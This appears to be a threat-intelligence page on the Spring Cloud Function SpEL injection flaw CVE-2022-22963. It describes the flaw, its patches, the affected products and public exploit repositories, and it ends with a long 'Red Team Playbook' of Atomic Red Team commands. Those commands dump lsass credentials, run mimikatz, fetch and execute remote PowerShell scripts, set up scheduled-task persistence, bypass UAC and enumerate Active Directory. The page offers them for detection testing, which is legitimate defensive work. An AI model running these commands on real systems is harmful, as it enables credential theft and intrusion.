CVE-2022-22963
Overview
This vulnerability is a remote code execution flaw caused by unsafe evaluation of Spring Expression Language (SpEL) inputs within the routing functionality of Spring Cloud Function. The root cause is the lack of proper validation or sanitization of the routing-expression parameter, which allows execution of arbitrary code. The affected component is the routing mechanism in Spring Cloud Function versions 3.1.6, 3.2.2, and earlier unsupported versions.
Vulnerability Description
In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
Impact
An unauthenticated attacker can exploit this vulnerability by sending a crafted request to the /functionRouter endpoint, resulting in arbitrary code execution on the affected system. This can lead to full system compromise including unauthorized access to local resources and execution of arbitrary commands. The lack of authentication or user interaction requirements significantly increases the risk of exploitation and potential data breaches or service disruption.
Solution
Apply the patches provided by VMware in their security advisory linked at https://tanzu.vmware.com/security/cve-2022-22963 which address this issue in Spring Cloud Function versions later than 3.1.6 and 3.2.2. Oracle also provides mitigations in their April 2022 Critical Patch Update. Refer to vendor advisories for detailed patch instructions and upgrade to fixed versions as recommended. Avoid using unsupported versions and disable routing-expression usage if immediate patching is not feasible.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Spring Cloud Function arises from improper handling of routing expressions, specifically when utilizing Spring Expression Language (SpEL). This flaw allows an attacker to craft malicious SpEL expressions that can be executed on the server. The routing functionality, which is designed to direct requests to specific functions based on the input, inadvertently opens a pathway for remote code execution. By exploiting this vulnerability, an attacker can manipulate the routing logic to execute arbitrary code, leading to unauthorized access to local resources and potentially compromising the entire application environment.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker could leverage a web application that utilizes Spring Cloud Function to send specially crafted requests containing malicious SpEL expressions. This could be done through various means, such as phishing attacks, where users are tricked into interacting with a compromised application. Once the malicious expression is processed by the server, the attacker gains the ability to execute arbitrary code, which could include accessing sensitive data, modifying application behavior, or even deploying malware within the environment.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Spring Cloud Function for their cloud-native applications. The potential for remote code execution poses a high business risk, as it can lead to data breaches, loss of customer trust, and financial repercussions. Organizations in sectors such as finance, healthcare, and e-commerce, where sensitive data is handled, are especially vulnerable. The exploitation of this vulnerability could result in severe operational disruptions, regulatory penalties, and long-term damage to brand reputation.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments and code reviews can help identify instances where routing expressions are used without proper validation or sanitization. Employing Web Application Firewalls (WAFs) can also provide an additional layer of defense by monitoring and filtering incoming requests for malicious payloads. Furthermore, organizations should ensure they are using the latest versions of Spring Cloud Function, as updates often include critical security patches. Educating development teams about secure coding practices and the risks associated with SpEL can also reduce the likelihood of exploitation.
In conclusion, the vulnerability within Spring Cloud Function represents a critical risk for organizations leveraging this technology. The ability for an attacker to execute arbitrary code through crafted routing expressions underscores the importance of robust security practices in software development and deployment. By proactively addressing this vulnerability through detection, mitigation, and education, organizations can significantly reduce their exposure to potential attacks and safeguard their digital assets.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2022-22963, evidenced by the emergence of new proof-of-concept tools that facilitate remote code execution via the Spring Cloud Function framework. Our telemetry indicates that adversaries are increasingly leveraging these publicly available exploits, which lowers the barrier for exploitation and broadens the attacker base beyond highly skilled threat actors. This shift significantly elevates the operational risk for organizations running vulnerable versions, as automated or semi-automated attacks become more feasible. Although the EPSS score remains high and stable, the expanded exploit landscape and increased detection frequency underscore a heightened threat environment. Consequently, the risk level associated with CVE-2022-22963 has intensified, warranting increased vigilance in monitoring and detection efforts.
Update 2 — July 04, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2022-22963, accompanied by the emergence of several new proof-of-concept exploits with enhanced capabilities. These developments have lowered the technical barriers for attackers, enabling a broader range of threat actors to leverage the vulnerability more effectively. Our telemetry indicates that the increased exploitation attempts are not only more frequent but also more sophisticated, suggesting active refinement of attack methodologies. This evolution in the exploit landscape significantly heightens the operational risk for organizations running vulnerable Spring Cloud Function versions, as automated and semi-automated attacks become increasingly viable. Consequently, the threat level associated with CVE-2022-22963 has intensified, underscoring the need for heightened detection and monitoring efforts to identify and respond to exploitation attempts promptly.
Affected Products (47)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Spring Cloud Function | All |
cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:*
|
|
|
Vmware | Spring Cloud Function | All |
cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Branch | 14.5 |
cpe:2.3:a:oracle:banking_branch:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Cash Management | 14.5 |
cpe:2.3:a:oracle:banking_cash_management:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Corporate Lending Process Management | 14.5 |
cpe:2.3:a:oracle:banking_corporate_lending_process_management:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Credit Facilities Process Management | 14.5 |
cpe:2.3:a:oracle:banking_credit_facilities_process_management:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Electronic Data Exchange For Corporates | 14.5 |
cpe:2.3:a:oracle:banking_electronic_data_exchange_for_corporates:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Liquidity Management | 14.2 |
cpe:2.3:a:oracle:banking_liquidity_management:14.2:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Liquidity Management | 14.5 |
cpe:2.3:a:oracle:banking_liquidity_management:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Origination | 14.5 |
cpe:2.3:a:oracle:banking_origination:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Supply Chain Finance | 14.5 |
cpe:2.3:a:oracle:banking_supply_chain_finance:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Trade Finance Process Management | 14.5 |
cpe:2.3:a:oracle:banking_trade_finance_process_management:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Banking Virtual Account Management | 14.5 |
cpe:2.3:a:oracle:banking_virtual_account_management:14.5:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Automated Test Suite | 1.9.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_automated_test_suite:1.9.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Automated Test Suite | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_automated_test_suite:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Console | 1.9.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_console:1.9.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Console | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_console:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Exposure Function | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_exposure_function:22.1.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Function Cloud Native Environment | 1.10.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*
|
|
|
Oracle | Communications Cloud Native Core Network Function Cloud Native Environment | 22.1.0 |
cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:22.1.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Spring Cloud Function SpEL Injection
exploits/multi/http/spring_cloud_function_spel_injection
|
m09u3r, hktalent, Spencer McIntyre | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Spring Cloud 3.2.2 - Remote Command Execution (RCE) | GatoGamer1155 | webapps | java | - | View |
GitHub PoCs (30)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
hktalent/spring-spel-0day-poc
spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963
|
hktalent | 355 | 78 | 2022-03-26 | View |
|
dinosn/CVE-2022-22963
CVE-2022-22963 PoC
|
dinosn | 115 | 40 | 2022-03-30 | View |
|
darryk10/CVE-2022-22963
|
darryk10 | 34 | 16 | 2022-03-30 | View |
|
J0ey17/CVE-2022-22963_Reverse-Shell-Exploit
CVE-2022-22963 is a vulnerability in the Spring Cloud Function Framework for Java that allows remote code execution. Thi...
|
J0ey17 | 24 | 2 | 2023-03-18 | View |
|
RanDengShiFu/CVE-2022-22963
CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_exploit
|
RanDengShiFu | 15 | 7 | 2022-03-30 | View |
|
kh4sh3i/Spring-CVE
This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the s...
|
kh4sh3i | 14 | 7 | 2022-03-31 | View |
|
me2nuk/CVE-2022-22963
Spring Cloud Function Vulnerable Application / CVE-2022-22963
|
me2nuk | 19 | 2 | 2022-03-31 | View |
|
stevemats/Spring0DayCoreExploit
{ Spring Core 0day CVE-2022-22963 }
|
stevemats | 3 | 9 | 2022-03-30 | View |
|
Kirill89/CVE-2022-22963-PoC
|
Kirill89 | 9 | 3 | 2022-03-30 | View |
|
k3rwin/spring-cloud-function-rce
Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)
|
k3rwin | 8 | 3 | 2022-04-14 | View |
|
charis3306/CVE-2022-22963
spring cloud function 一键利用工具! by charis 博客https://charis3306.top/
|
charis3306 | 8 | 0 | 2023-03-07 | View |
|
iliass-dahman/CVE-2022-22963-POC
|
iliass-dahman | 4 | 0 | 2023-01-15 | View |
|
lemmyz4n3771/CVE-2022-22963-PoC
CVE-2022-22963 RCE PoC in python
|
lemmyz4n3771 | 4 | 0 | 2023-03-13 | View |
|
randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE
|
randallbanner | 4 | 0 | 2023-04-17 | View |
|
puckiestyle/CVE-2022-22963
|
puckiestyle | 1 | 1 | 2022-03-31 | View |
|
twseptian/cve-2022-22963
Spring Cloud Function SpEL - cve-2022-22963
|
twseptian | 2 | 0 | 2022-04-03 | View |
|
xmqaq/CVE-2022-22963
CVE-2022-22963-poc
|
xmqaq | 1 | 0 | 2023-12-28 | View |
|
AayushmanThapaMagar/CVE-2022-22963
POC for CVE-2022-22963
|
AayushmanThapaMagar | 1 | 0 | 2022-04-01 | View |
|
SealPaPaPa/SpringCloudFunction-Research
CVE-2022-22963 research
|
SealPaPaPa | 1 | 0 | 2022-04-05 | View |
|
jrbH4CK/CVE-2022-22963
|
jrbH4CK | 0 | 1 | 2024-05-08 | View |
|
SourM1lk/CVE-2022-22963-Exploit
Rust-based exploit for the CVE-2022-22963 vulnerability
|
SourM1lk | 1 | 0 | 2023-04-10 | View |
|
nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963
Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function
|
nikn0laty | 0 | 1 | 2023-05-25 | View |
|
cyberager/CVE-2022-22963
Simple exploit
|
cyberager | 0 | 0 | 2026-05-05 | View |
|
teofoli-matteo/CVE-2022-22963---Software-Vulnerabilities
|
teofoli-matteo | 0 | 0 | 2026-04-28 | View |
|
75ACOL/CVE-2022-22963
|
75ACOL | 0 | 0 | 2022-09-01 | View |
|
Mustafa1986/CVE-2022-22963
|
Mustafa1986 | 0 | 0 | 2023-03-21 | View |
|
gunzf0x/CVE-2022-22963
Binaries for CVE-2022-22963
|
gunzf0x | 0 | 0 | 2023-05-03 | View |
|
Shayz614/CVE-2022-22963
CVE to CTF FP
|
Shayz614 | 0 | 0 | 2024-12-13 | View |
|
BearClaw96/CVE-2022-22963-Poc-Bearcules
This is a POC for CVE-2022-22963
|
BearClaw96 | 0 | 0 | 2023-10-28 | View |
|
G01d3nW01f/CVE-2022-22963
|
G01d3nW01f | 0 | 0 | 2022-04-11 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-22963 |
| tanzu.vmware.com |
GitHub CVE
|
https://tanzu.vmware.com/security/cve-2022-22963 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH |
| oracle.com |
GitHub CVE
|
https://www.oracle.com/security-alerts/cpuapr2022.html |
| psirt.global.sonicwall.com |
GitHub CVE
|
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005 |
